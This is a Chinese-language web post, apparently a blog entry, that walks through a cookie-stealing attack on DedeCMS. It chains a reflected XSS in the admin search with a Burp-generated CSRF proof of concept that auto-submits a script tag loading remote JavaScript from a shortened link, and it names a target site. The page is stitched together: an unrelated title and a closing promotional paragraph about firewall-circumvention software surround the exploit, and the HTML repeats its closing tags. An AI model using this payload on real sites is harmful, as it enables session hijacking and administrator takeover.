翻墙软件

Dedecms的后台搜索的地方存在反射xss,但是我们可以构造src地址,让他加载代码。

这里我利用xss平台来外部加载一串js代码来获取cookie并发送到xss平台

payload: <script src=http://t.cn/RV0DcTG></script>

然后我们在利用dedecms的csrf来创建一个html文件

csrf poc:

<html>  

<!-- CSRF PoC - generated by Burp Suite Professional -->  

<body>    

<form form id="myform" action="http://www.haoyundu.com(这里填写网站)/dede/action_search.php" method="POST">      

<input type="hidden" name="keyword" value="<script src=http://t.cn/RV0DcTG></script>" />    

<script>      function validate(){  document.getElementById('myform').submit();}setTimeout(validate,100); 

</script>   

</form>  

</body>

</html>    

</form> 

</body>

</html>


保存为html文件,然后打开。发现已经js已经提交了表单并发送了cookie


请注意:网络时代讲究速度有全面的资讯,虽然互联网是一张密集的网络但由于各国之间相互交错,其实很多资讯与信息我们并不能完全获取,然而有技术的就可以通过翻墙访问全世界的每一个角落。不论您是长期从事何种职业当资源与信息匮乏时,即可通过参照本文进行简单设置电脑翻墙、手机(苹果IOS翻墙、安卓手机翻墙)、火狐浏览器翻墙、谷歌chrome浏览器翻墙等通通不在话下。并且特别针对与youtube、twitter推特、facebook翻墙等工具的使用和教程,保持长期稳定的更新幅度保障大家畅连全世界!